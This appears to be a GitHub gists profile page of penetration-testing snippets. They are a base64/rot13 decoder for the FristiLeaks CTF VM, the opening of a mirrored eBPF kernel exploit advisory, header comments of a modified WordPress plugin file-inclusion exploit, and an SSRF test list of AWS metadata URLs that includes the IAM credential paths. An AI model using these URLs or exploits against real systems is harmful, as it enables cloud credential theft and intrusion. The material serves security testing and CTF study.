Skip to content

Instantly share code, notes, and snippets.

💭
I may be slow to respond.

Wen Bin kongwenbin

💭
I may be slow to respond.
View GitHub Profile
@kongwenbin
kongwenbin / decryptpass.py
Created Dec 30, 2017
A simple function to decode base64 encoded content designed for VulnHub VM - FristiLeaks v1.3
View decryptpass.py
#Wrote this simple function to solve the CTF designed for FristiLeaks v1.3 VulnHub VM
#!/usr/bin/python
import base64,codecs,sys
def decodeString(str):
decode = codecs.decode(str[::-1], 'rot13')
return base64.b64decode(decode)
cryptoResult=decodeString(sys.argv[1])
print cryptoResult
@kongwenbin
kongwenbin / 39772.txt
Created Apr 22, 2018
A mirror of the content stored in 39772.txt obtained through exploit-db.com
View 39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.
When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
@kongwenbin
kongwenbin / 39646.py
Last active Apr 30, 2018
Modified exploit for WordPress Plugin Advanced Video 1.0 - Local File Inclusion - fixed the SSL issue
View 39646.py
#!/usr/bin/env python
# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / Wordpress 4.2.2
@kongwenbin
kongwenbin / cloud_metadata.txt
Created Jul 13, 2018 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
You can’t perform that action at this time.